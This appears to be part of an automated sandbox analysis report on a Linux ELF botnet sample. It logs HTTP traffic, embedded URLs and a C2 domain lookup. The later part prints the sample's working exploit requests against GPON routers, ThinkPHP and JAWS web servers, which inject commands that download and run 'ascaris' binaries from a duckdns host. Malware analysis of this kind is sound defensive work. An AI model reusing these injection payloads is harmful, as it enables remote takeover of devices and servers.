74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:34 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:58:34 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:34 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 18Date: Sun, 23 Oct 2022 15:58:35 GMT
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:58:36 GMTServer: ApacheX-SERVER: 5Content-Length: 221Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 38 3a 33 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 53 45 52 56 45 52 3a 20 35 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:58:36 GMTServer: ApacheX-SERVER: 5Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sun, 23 Oct 2022 15:58:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 21 2b d1 07 59 02 32 54 1f ea 40 00 da 1e 3f 07 a9 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 84(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!+Y2T@?0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Connection: closeDate: Sun, 20 Mar 2022 12:16:12 GMTServer: lighttpd/1.4.54Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:37 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:58:37 GMTConnection: keep-aliveContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:58:39 GMTServer: ApacheContent-Length: 221Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 23 Oct 2022 15:58:39 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:59:02 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: fMB6uAXjd0.elfString found in binary or memory: http://amkbins.duckdns.org/bins/ascaris.arm7;
            Source: fMB6uAXjd0.elfString found in binary or memory: http://amkbins.duckdns.org/bins/ascaris.arm7;chmod
            Source: fMB6uAXjd0.elfString found in binary or memory: http://amkbins.duckdns.org/bins/ascaris.mips
            Source: fMB6uAXjd0.elfString found in binary or memory: http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20-
            Source: fMB6uAXjd0.elfString found in binary or memory: http://amkbins.duckdns.org/bins/ascaris.x86
            Source: fMB6uAXjd0.elfString found in binary or memory: http://amkbins.duckdns.org/gpon
            Source: fMB6uAXjd0.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: fMB6uAXjd0.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 2f 67 70 6f 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://amkbins.duckdns.org/gpon+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
            Source: unknownDNS traffic detected: queries for: amkcnc.duckdns.org
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
